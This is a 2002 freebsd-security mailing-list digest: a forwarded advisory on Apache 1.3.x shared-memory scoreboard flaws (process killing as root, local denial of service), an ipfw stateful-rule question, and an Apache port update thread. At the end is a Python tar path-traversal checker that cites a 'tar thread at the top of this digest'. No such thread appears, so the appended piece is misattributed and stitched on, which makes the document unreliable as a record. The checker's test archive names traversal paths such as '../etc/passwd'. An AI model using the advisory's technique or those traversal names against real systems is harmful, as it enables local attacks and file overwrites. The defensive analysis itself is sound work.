Message-Id: <5.1.1.6.0.20021004001325.0397c618@marble.sentex.ca>
Date: Fri, 04 Oct 2002 00:15:16 -0400
To: freebsd-security@freebsd.org
From: Mike Tancsa
Subject: Fwd: iDEFENSE Security Advisory 10.03.2002: Apache 1.3.x shared memory scoreboard vulnerabilities

FYI for those of you not on bugtraq.
---Mike

>From: "David Endler"
>To: bugtraq@securityfocus.com
>Date: Thu, 3 Oct 2002 12:47:54 -0400
>Subject: iDEFENSE Security Advisory 10.03.2002: Apache 1.3.x shared memory scoreboard vulnerabilities
>Reply-To: dendler@idefense.com
>
>iDEFENSE Security Advisory 10.03.2002
>Apache 1.3.x shared memory scoreboard vulnerabilities
>
>16:00 GMT, October 3, 2002
>
>
>I. BACKGROUND
>
>The Apache Software Foundation's HTTP Server is an effort to develop and maintain an open-source HTTP server for modern operating systems including Unix and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards. More details about it are available at http://httpd.apache.org .
>
>II. DESCRIPTION
>
>Apache HTTP Server contains a vulnerability in its shared memory scoreboard. Attackers who can execute commands under the Apache UID can either send a (SIGUSR1) signal to any process as root, in most cases killing the process, or launch a local denial of service (DoS) attack.
>
>III. ANALYSIS
>
>Exploitation requires execute permission under the Apache UID. This can be obtained by any local user with a legitimate Apache scripting resource (ie: PHP, Perl), exploiting a vulnerability in web-based applications written in the above example languages, or through the use of some other local/remote Apache exploit.
>
>Once such a status is attained, the attacker can then attach to the httpd daemon's 'scoreboard', which is stored in a shared memory segment owned by Apache. The attacker can then cause a DoS condition on the system by continuously filling the table with null values and causing the server to spawn new children.
>
>The attacker also has the ability to send any process a SIGUSR1 signal as root. This is accomplished by continuously overwriting the parent[].pid and parent[].last_rtime segments within the scoreboard to the pid of the target process and a time in the past. When the target pid receives the signal SIGUSR1, it will react according to how it is designed to manage the signal. According to the man page (man 7 signal), if the signal is un-handled then the default action is to terminate:
>
>    ...
>    SIGUSR1    30,10,16    A    User-defined signal 1
>    ...
>    The letters in the "Action" column have the following meanings:
>
>    A    Default action is to terminate the process.
>    ...
>
>iDEFENSE successfully terminated arbitrary processes, including those that "kicked" people off the system.
>
>IV. DETECTION
>
>Apache HTTP Server 1.3.x, running on all applicable Unix platforms, is affected.
>
>V. VENDOR FIX/RESPONSE
>
>Apache HTTP Server 1.3.27 fixes this problem. It should be available on October 3 at http://www.apache.org/dist/httpd/ .
>
>VI. CVE INFORMATION
>
>The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project has assigned the identification number CAN-2002-0839 to this issue.
>
>VII. DISCLOSURE TIMELINE
>
>8/27/2002  Issue disclosed to iDEFENSE
>9/18/2002  Vendor notified at security@apache.org
>9/18/2002  iDEFENSE clients notified
>9/19/2002  Response received from Mark J Cox (mark@awe.com)
>10/3/2002  Coordinated public disclosure
>
>VIII. CREDIT
>
>zen-parse (zen-parse@gmx.net) disclosed this issue to iDEFENSE.
>
>
>Get paid for security research
>http://www.idefense.com/contributor.html
>
>Subscribe to iDEFENSE Advisories:
>send email to listserv@idefense.com, subject line: "subscribe"
>
>
>About iDEFENSE:
>
>iDEFENSE is a global security intelligence company that proactively monitors sources throughout the world - from technical vulnerabilities and hacker profiling to the global spread of viruses and other malicious code. iALERT, our security intelligence service, provides decision-makers, frontline security professionals and network administrators with timely access to actionable intelligence and decision support on cyber-related threats. For more information, visit http://www.idefense.com.
>
>
>-dave
>
>David Endler, CISSP
>Director, Technical Intelligence
>iDEFENSE, Inc.
>14151 Newbrook Drive
>Suite 100
>Chantilly, VA 20151
>voice: 703-344-2632
>fax: 703-961-1071
>
>dendler@idefense.com
>www.idefense.com

--------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400
Sentex Communications, mike@sentex.net
Providing Internet since 1994 www.sentex.net
Cambridge, Ontario Canada www.sentex.net/mike

From owner-freebsd-security Fri Oct 4 07:18:38 2002
Message-Id: <5.1.1.6.0.20021004101636.04870680@marble.sentex.ca>
Date: Fri, 04 Oct 2002 10:19:14 -0400
To: freebsd-security@freebsd.org
From: Mike Tancsa
Subject: still time for apache security fix ?
Cc: re@freebsd.org

Will there be time to update 4.7R to include Apache 1.3.27 ? There are a number of security issues fixed in this rev. (see http://httpd.apache.org/)

---Mike

From owner-freebsd-security Fri Oct 4 08:36:02 2002
Date: Fri, 4 Oct 2002 17:35:54 +0200
From: Aragon Gouveia
To: freebsd-security@freebsd.org
Subject: ipfw stateful help - strange behaviour
Message-ID: <20021004153554.GD5787@phat.za.net>
X-Operating-System: FreeBSD 4.6-RC i386

Hi,

I'm having a problem with ipfw's stateful operation which I can't quite figure out. Let me start with my ruleset.

00100 check-state
00500 allow tcp from any to 66.8.x.y 80 keep-state setup
01000 deny tcp from any to 66.8.x.y 80
65535 allow ip from any to any

Ok this ruleset works great from all my machines. But I'm noticing a lot of traffic is hitting rule 1000. When enabling logging on rule 1000, I see around 10 hits a minute. I know it could be arbitrarily generated packets directed at 66.8.x.y on port 80, but with this frequency it doesn't look right. So I changed my ruleset slightly to this:

00100 check-state
00500 allow tcp from any to 66.8.x.y 80 keep-state setup
01000 fwd 66.8.b.c,34501 tcp from any to 66.8.x.y 80
65535 allow ip from any to any

This allowed me to analyse what was hitting rule 1000 by running tcpdump on 66.8.b.c. Here's the output:

17:06:45.824689 0:10:b5:42:7d:69 0:20:ed:34:c9:6c 0800 60: 213.155.147.226.61175 > 66.8.x.y.80: R 1312082120:1312082120(0) win 0 (DF)
17:06:45.824722 0:10:b5:42:7d:69 0:20:ed:34:c9:6c 0800 60: 213.155.147.226.61175 > 66.8.x.y.80: R 1312082120:1312082120(0) win 0
17:07:42.377830 0:10:b5:42:7d:69 0:20:ed:34:c9:6c 0800 60: 212.125.65.237.23973 > 66.8.x.y.80: . ack 1478932865 win 7300 (DF)
17:07:42.393216 0:10:b5:42:7d:69 0:20:ed:34:c9:6c 0800 60: 212.125.65.237.23853 > 66.8.x.y.80: . ack 1478195413 win 7300 (DF)
17:07:42.393275 0:10:b5:42:7d:69 0:20:ed:34:c9:6c 0800 60: 212.125.65.237.23971 > 66.8.x.y.80: . ack 1478797841 win 7300 (DF)
17:07:42.393343 0:10:b5:42:7d:69 0:20:ed:34:c9:6c 0800 60: 212.125.65.237.24168 > 66.8.x.y.80: . ack 1479411419 win 7300 (DF)
17:07:42.423224 0:10:b5:42:7d:69 0:20:ed:34:c9:6c 0800 60: 212.125.65.237.24170 > 66.8.x.y.80: . ack 1479562687 win 7300 (DF)
17:07:45.421580 0:10:b5:42:7d:69 0:20:ed:34:c9:6c 0800 60: 212.125.65.237.24170 > 66.8.x.y.80: . ack 1 win 7300 (DF)
17:07:45.422375 0:10:b5:42:7d:69 0:20:ed:34:c9:6c 0800 60: 212.125.65.237.23853 > 66.8.x.y.80: . ack 1 win 7300 (DF)
17:07:45.424352 0:10:b5:42:7d:69 0:20:ed:34:c9:6c 0800 60: 212.125.65.237.23971 > 66.8.x.y.80: . ack 1 win 7300 (DF)
17:07:45.511551 0:10:b5:42:7d:69 0:20:ed:34:c9:6c 0800 60: 212.125.65.237.23973 > 66.8.x.y.80: . ack 1 win 7300 (DF)
17:07:45.511607 0:10:b5:42:7d:69 0:20:ed:34:c9:6c 0800 60: 212.125.65.237.24168 > 66.8.x.y.80: . ack 1 win 7300 (DF)

Okay, what gives - no SYN packets. So I checked the state table a few seconds after these packets were forwarded to 66.8.b.c and:

00500 227 135562 (T 252, slot 78) <-> tcp, 213.155.147.226 61162<->66.8.x.y 80
00500 101  33708 (T 254, slot 92) <-> tcp, 213.155.147.226 61176<->66.8.x.y 80
00500   3    132 (T 299, slot 149) <-> tcp, 212.125.65.237 24638<-> 66.8.x.y 80
00500   3    132 (T 299, slot 150) <-> tcp, 212.125.65.237 24637<-> 66.8.x.y 80

So it looks like the connections are matching the 'setup' flag and entering the state table, but they're not being matched by 'check-state' on further communication. Any ideas? I'm using IPFW1 on 4.7-RC.
Thanks,
Aragon

From owner-freebsd-security Fri Oct 4 09:18:00 2002
Date: Fri, 4 Oct 2002 09:17:55 -0700
From: Kris Kennaway
To: Mike Tancsa
Cc: freebsd-security@FreeBSD.ORG, re@FreeBSD.ORG
Subject: Re: still time for apache security fix ?
Message-ID: <20021004161755.GB24842@xor.obsecurity.org>
References: <5.1.1.6.0.20021004101636.04870680@marble.sentex.ca>
In-Reply-To: <5.1.1.6.0.20021004101636.04870680@marble.sentex.ca>

On Fri, Oct 04, 2002 at 10:19:14AM -0400, Mike Tancsa wrote:
>
> Will there be time to update 4.7R to include Apache 1.3.27 ? There are a
> number of security issues fixed in this rev. (see http://httpd.apache.org/)

Yes.
Kris

From owner-freebsd-security Sat Oct 5 05:48:55 2002
Message-Id: <5.1.0.14.0.20021005084558.062ddb78@192.168.0.12>
Date: Sat, 05 Oct 2002 08:46:53 -0400
To: Kris Kennaway
From: Mike Tancsa
Subject: Re: still time for apache security fix ?
Cc: freebsd-security@FreeBSD.ORG, re@FreeBSD.ORG
In-Reply-To: <20021004161755.GB24842@xor.obsecurity.org>
References: <5.1.1.6.0.20021004101636.04870680@marble.sentex.ca>

At 09:17 AM 10/4/2002 -0700, Kris Kennaway wrote:
>On Fri, Oct 04, 2002 at 10:19:14AM -0400, Mike Tancsa wrote:
> >
> > Will there be time to update 4.7R to include Apache 1.3.27 ? There are a
> > number of security issues fixed in this rev. (see http://httpd.apache.org/)
>
>Yes.

Hi,

Thanks for the commit. One question, is the gid supposed to be nogroup, or www ?

HAS_CONFIGURE=  yes
CONFIGURE_ARGS= \
        --prefix=${PREFIX} \
        --server-gid=nogroup \

---Mike

From owner-freebsd-security Sat Oct 5 05:53:06 2002
Message-Id: <5.1.0.14.0.20021005085022.03ace218@192.168.0.12>
Date: Sat, 05 Oct 2002 08:51:04 -0400
To: kris@FreeBSD.ORG
From: Mike Tancsa
Subject: Re: still time for apache security fix ?
Cc: Kris Kennaway, freebsd-security@FreeBSD.ORG, re@FreeBSD.ORG
In-Reply-To: <5.1.0.14.0.20021005084558.062ddb78@192.168.0.12>
References: <20021004161755.GB24842@xor.obsecurity.org> <5.1.1.6.0.20021004101636.04870680@marble.sentex.ca>

At 08:46 AM 10/5/2002 -0400, Mike Tancsa wrote:
>Hi,
> Thanks for the commit. One question, is the gid supposed to be
> nogroup, or www ?
>HAS_CONFIGURE= yes
>CONFIGURE_ARGS= \
> --prefix=${PREFIX} \
> --server-gid=nogroup \

Whoops, sorry for the noise. My mistake. I was looking at the old apache13-ssl, not apache13-modssl directory.

---Mike
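The "tar tvf | fgrep '..'" check from the tar thread at the top of this digest, and Alexandr Kovalenko's objection that 'file..name' is a legitimate name, as an added example that is not part of any message above: a Python check (standard tarfile module, sample archive constructed in memory) that walks each member name component by component instead of matching the substring, and also flags escapes a substring grep cannot see at all (absolute names, symlinks and hard links whose target leaves the extraction root).

```python
"""Path-aware check for upwards directory traversal in a tar archive.

Added example, not code from the thread. It compares the substring test
quoted in the thread (tar tvf | fgrep '..') with a check that parses each
member name component by component, so 'file..name' is accepted while
'../x', '/x' and links whose target leaves the extraction root are
flagged. The sample archive below is constructed in memory.
"""
import io
import posixpath
import tarfile


def is_unsafe_path(name):
    """True if NAME, resolved against the extraction root, escapes it.

    Only a component that is exactly '..' climbs a level; 'file..name'
    is an ordinary component and never triggers.
    """
    if name.startswith("/"):
        return True
    depth = 0
    for part in name.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            depth -= 1
            if depth < 0:  # climbed above the extraction root
                return True
        else:
            depth += 1
    return False


def naive_dotdot_grep(tar):
    """The fgrep '..' check from the thread: a substring match on names."""
    return [m.name for m in tar.getmembers() if ".." in m.name]


def unsafe_members(tar):
    """Return (name, reason) for each member that would escape the root."""
    findings = []
    for m in tar.getmembers():
        if is_unsafe_path(m.name):
            findings.append((m.name, "path escapes extraction root"))
            continue
        if m.issym():
            # A symlink target is resolved relative to the link's own directory.
            target = posixpath.join(posixpath.dirname(m.name), m.linkname)
        elif m.islnk():
            # A hard link target is archive-relative, like a member name.
            target = m.linkname
        else:
            continue
        if is_unsafe_path(target):
            findings.append((m.name, "link target escapes extraction root"))
    return findings


def build_sample_archive():
    """Constructed sample: one benign 'file..name' plus several escapes."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name in ("file..name", "../etc/passwd", "/etc/passwd",
                     "dir/../../x", "dir/ok"):
            info = tarfile.TarInfo(name)
            info.size = 1
            tar.addfile(info, io.BytesIO(b"x"))
        link = tarfile.TarInfo("dir/escape")  # no '..' in its own name
        link.type = tarfile.SYMTYPE
        link.linkname = "../../outside"
        tar.addfile(link)
    return buf.getvalue()


def analyze_sample():
    """Run both checks over the sample; returns (grep_hits, path_aware)."""
    with tarfile.open(fileobj=io.BytesIO(build_sample_archive())) as tar:
        return naive_dotdot_grep(tar), unsafe_members(tar)


if __name__ == "__main__":
    grep_hits, path_aware = analyze_sample()
    print("fgrep '..' flags :", grep_hits)   # includes the benign file..name
    print("path-aware flags :", path_aware)  # catches /etc/passwd and the link
```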